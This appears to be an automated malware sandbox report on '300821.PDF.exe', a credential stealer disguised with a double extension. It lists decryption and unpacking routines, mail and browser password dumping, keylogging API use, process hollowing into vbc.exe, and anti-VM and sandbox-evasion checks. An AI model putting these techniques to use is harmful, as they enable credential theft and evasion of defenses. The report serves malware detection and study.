                      Source: 5.2.300821.PDF.exe.400000.0.unpack, Form1.csBase64 encoded string: 'kU9AKBYzTfDozk78v7S8AJ4qRIoajat5imvHiMgiRkXdoX1WWUMkcLeIbq0f5Ki+', 'ggUy50Tcd18+XCI8OVsRlV1xkFCd6kyYX/QGFeNONAN7gYAXhVHJnfOOd2WfSU1H', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00411EF8 FindResourceW,SizeofResource,LoadResource,LockResource,
                      Source: 5.2.300821.PDF.exe.400000.0.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                      Source: 5.2.300821.PDF.exe.400000.0.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                      Source: 5.2.300821.PDF.exe.400000.0.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                      Source: 5.2.300821.PDF.exe.400000.0.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
                      Source: C:\Users\user\Desktop\300821.PDF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\300821.PDF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\300821.PDF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\300821.PDF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                      Source: 300821.PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: 300821.PDF.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.915489413.0000000002B61000.00000004.00000001.sdmp
                      Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, vbc.exe
                      Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: 300821.PDF.exe, 00000000.00000002.667948277.0000000004BA1000.00000004.00000001.sdmp, 300821.PDF.exe, 00000005.00000002.916254009.0000000003B61000.00000004.00000001.sdmp, vbc.exe

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: 5.2.300821.PDF.exe.400000.0.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.2.300821.PDF.exe.400000.0.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.2.300821.PDF.exe.400000.0.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.2.300821.PDF.exe.400000.0.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\300821.PDF.exeCode function: 0_2_00A66B4E push ss; iretd
                      Source: C:\Users\user\Desktop\300821.PDF.exeCode function: 5_2_006F6B4E push ss; iretd
                      Source: C:\Users\user\Desktop\300821.PDF.exeCode function: 5_2_078BFA12 push 00000066h; ret
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00442871 push ecx; ret
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00442A90 push eax; ret
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00442A90 push eax; ret
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00446E54 push eax; ret
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 9_2_00411879 push ecx; ret
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 9_2_004118A0 push eax; ret
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 9_2_004118A0 push eax; ret
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004422C7 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.08241150269

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Changes the view of files in windows explorer (hidden files and folders)Show sources
                      Source: C:\Users\user\Desktop\300821.PDF.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
                      Uses an obfuscated file name to hide its real file extension (double extension)Show sources
                      Source: Possible double extension: pdf.exeStatic PE information: 300821.PDF.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00441975 memset,wcscpy,memset,wcscpy,wcscat,wcscpy,wcscat,wcscpy,wcscat,GetModuleHandleW,LoadLibraryExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\Desktop\300821.PDF.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 00000000.00000002.665567909.0000000002FA5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 300821.PDF.exe PID: 4816, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: 300821.PDF.exe, 00000000.00000002.665567909.0000000002FA5000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: 300821.PDF.exe, 00000000.00000002.665567909.0000000002FA5000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\300821.PDF.exe TID: 4744Thread sleep time: -39128s >= -30000s
                      Source: C:\Users\user\Desktop\300821.PDF.exe TID: 1664Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\300821.PDF.exe TID: 6784Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\300821.PDF.exe TID: 5712Thread sleep time: -120000s >= -30000s
                      Source: C:\Users\user\Desktop\300821.PDF.exe TID: 6104Thread sleep time: -140000s >= -30000s
                      Source: C:\Users\user\Desktop\300821.PDF.exe TID: 5648Thread sleep time: -98400s >= -30000s
                      Source: C:\Users\user\Desktop\300821.PDF.exe TID: 7140Thread sleep time: -180000s >= -30000s
                      Source: C:\Users\user\Desktop\300821.PDF.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                      Source: C:\Users\user\Desktop\300821.PDF.exeCode function: 5_2_0100B890 sidt fword ptr [eax]
                      Source: C:\Users\user\Desktop\300821.PDF.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\300821.PDF.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\300821.PDF.exeThread delayed: delay time: 180000
                      Source: C:\Users\user\Desktop\300821.PDF.exeWindow / User API: threadDelayed 492
                      Source: C:\Users\user\Desktop\300821.PDF.exeCode function: 5_2_01006320 sgdt fword ptr [eax]
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004161B0 memset,GetSystemInfo,
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 9_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
                      Source: C:\Users\user\Desktop\300821.PDF.exeThread delayed: delay time: 39128
                      Source: C:\Users\user\Desktop\300821.PDF.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\300821.PDF.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\300821.PDF.exeThread delayed: delay time: 120000
                      Source: C:\Users\user\Desktop\300821.PDF.exeThread delayed: delay time: 140000
                      Source: C:\Users\user\Desktop\300821.PDF.exeThread delayed: delay time: 180000
                      Source: 300821.PDF.exe, 00000000.00000002.665567909.0000000002FA5000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: 300821.PDF.exe, 00000000.00000002.665567909.0000000002FA5000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: 300821.PDF.exe, 00000000.00000002.665567909.0000000002FA5000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: 300821.PDF.exe, 00000000.00000002.665567909.0000000002FA5000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: bhvE2B1.tmp.8.drBinary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&ctry=US&time=20200930T073559Z&lc=en-US&pl=en-US&idtp=mid&uid=a9223225-82ba-4622-a95e-dcecd6738abd&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=1002378dd3f24e12b7a10ceb62be6d33&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663203&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663203&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
                      Source: 300821.PDF.exe, 00000000.00000002.665567909.0000000002FA5000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: 300821.PDF.exe, 00000000.00000002.665567909.0000000002FA5000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: 300821.PDF.exe, 00000000.00000002.665567909.0000000002FA5000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: 300821.PDF.exe, 00000000.00000002.665567909.0000000002FA5000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004422C7 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\300821.PDF.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Sample uses process hollowing techniqueShow sources
                      Source: C:\Users\user\Desktop\300821.PDF.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                      Source: C:\Users\user\Desktop\300821.PDF.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                      .NET source code references suspicious native API functionsShow sources
                      Source: 5.2.300821.PDF.exe.400000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                      Source: 5.2.300821.PDF.exe.400000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess created: C:\Users\user\Desktop\300821.PDF.exe C:\Users\user\Desktop\300821.PDF.exe
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                      Source: C:\Users\user\Desktop\300821.PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Users\user\Desktop\300821.PDF.exe VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\300821.PDF.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
